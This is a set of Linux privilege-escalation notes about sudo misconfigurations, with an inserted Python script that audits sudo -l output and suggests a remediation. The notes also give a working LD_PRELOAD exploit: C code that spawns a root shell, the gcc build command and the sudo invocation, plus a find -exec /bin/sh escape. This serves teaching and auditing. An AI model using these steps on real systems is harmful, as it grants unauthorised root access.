Sudo
Suppose for the examples below, the low-privileged user is allowed to run the find command with sudo privileges:
$ sudo -l
Matching Defaults entries for [] on ...:
env_reset, mail_badpass, env_keep+=LD_PRELOAD
...
User [] may run the following commands on ...:
...
(ALL) NOPASSWD: /usr/bin/find
...
LD_PRELOAD env variable
LD_PRELOAD is an environment variable in Linux that allows you to force the system to load specific shared libraries before any other libraries when running a program.
Example
To exploit the LD_PRELOAD environment variable, look for env_keep+=LD_PRELOAD in the output of the sudo -l command.
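A defender can automate this check instead of reading sudo -l by eye. The script below is an added example, not part of the original notes: it parses a constructed sudo -l transcript (hypothetical user "lowpriv" and host "host01", plus a second, argument-restricted rule for contrast) and flags the three things an auditor cares about in the listing above: loader variables such as LD_PRELOAD kept through env_reset, NOPASSWD rules, and rules whose bare program path permits any arguments. It also accepts the quoted multi-variable form env_keep+="A B", which goes beyond the single-variable form shown on this page.

```python
import re

# Constructed `sudo -l` transcript in the shape of the listing above; the user,
# host and second rule are hypothetical, not output from any real system.
SAMPLE_SUDO_L = """\
Matching Defaults entries for lowpriv on host01:
    env_reset, mail_badpass, env_keep+=LD_PRELOAD,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User lowpriv may run the following commands on host01:
    (ALL) NOPASSWD: /usr/bin/find
    (root) /usr/bin/systemctl restart nginx
"""

# Dynamic-loader variables; if env_keep preserves any of them, a caller can make
# every sudo-run program load code of their choosing.
RISKY_ENV_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT"}

# "(runas) TAG: TAG: command args" -- tags such as NOPASSWD: are optional.
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(.+)$")


def parse_sudo_l(text):
    """Return {'defaults': [...], 'rules': [...]} from `sudo -l` output."""
    defaults, rules, section = [], [], None
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped:
            continue
        if stripped.startswith("Matching Defaults entries"):
            section = "defaults"
            continue
        if stripped.startswith("User ") and "may run" in stripped:
            section = "rules"
            continue
        if section == "defaults":
            # Defaults are comma-separated and may wrap across lines.
            defaults.extend(p.strip() for p in stripped.split(",") if p.strip())
        elif section == "rules":
            m = RULE_RE.match(stripped)
            if m:
                runas, tags, cmd = m.groups()
                rules.append({
                    "runas": runas.strip(),
                    "tags": {t.rstrip(":") for t in tags.split()},
                    "command": cmd.strip(),
                })
    return {"defaults": defaults, "rules": rules}


def kept_env_vars(defaults):
    """Collect names from env_keep entries (bare or "quoted space-separated")."""
    names = set()
    for entry in defaults:
        if entry.startswith("env_keep") and "=" in entry:
            value = entry.split("=", 1)[1].strip().strip('"')
            names.update(value.split())
    return names


def audit(text):
    """Return a list of finding strings for the given `sudo -l` output."""
    parsed = parse_sudo_l(text)
    findings = []
    for name in sorted(kept_env_vars(parsed["defaults"]) & RISKY_ENV_VARS):
        findings.append(f"env_keep preserves {name}: env_reset is bypassed for loader variables")
    for rule in parsed["rules"]:
        cmd = rule["command"]
        where = f"{cmd} (as {rule['runas']})"
        if "NOPASSWD" in rule["tags"]:
            findings.append(f"NOPASSWD: {where} runs without re-authentication")
        if cmd == "ALL":
            findings.append(f"ALL: {where} grants unrestricted command execution")
        elif len(cmd.split()) == 1:
            # A bare path in sudoers matches the program with any arguments.
            findings.append(f"unrestricted arguments: {where} accepts any arguments")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_SUDO_L):
        print("-", finding)
```

On the constructed sample this reports the kept LD_PRELOAD, the NOPASSWD rule for /usr/bin/find, and find's lack of argument restriction, while the systemctl rule (password required, fixed arguments) produces nothing. The remediation for the first finding is simply to remove LD_PRELOAD from env_keep: with env_reset in effect, sudo already drops LD_* variables unless they are explicitly kept.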
C code which simply spawns a root shell:
shell.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid(), setuid() */
/* With -nostartfiles, _init runs when the loader maps this library. */
void _init() {
    unsetenv("LD_PRELOAD");   /* don't preload again inside the spawned shell */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
Using gcc to compile the C code into a shared object file:
$ gcc -fPIC -shared -o shell.so shell.c -nostartfiles
-fPIC
If supported for the target machine, emit position-independent code, suitable for dynamic linking and avoiding any limit on the size of the global offset table.
-shared
Produce a shared object which can then be linked with other objects to form an executable
-nostartfiles
Do not use the standard system startup files when linking
Run the find command with LD_PRELOAD set to the previously created shared object file. This executes the C code, which spawns the root shell:
$ sudo LD_PRELOAD=.../shell.so find
Binaries with sudo privileges
Suppose the binary with sudo privilege is /usr/bin/find:
$ sudo find . -exec /bin/sh \; -quit
Adapted from: https://gtfobins.github.io/gtfobins/find/#sudo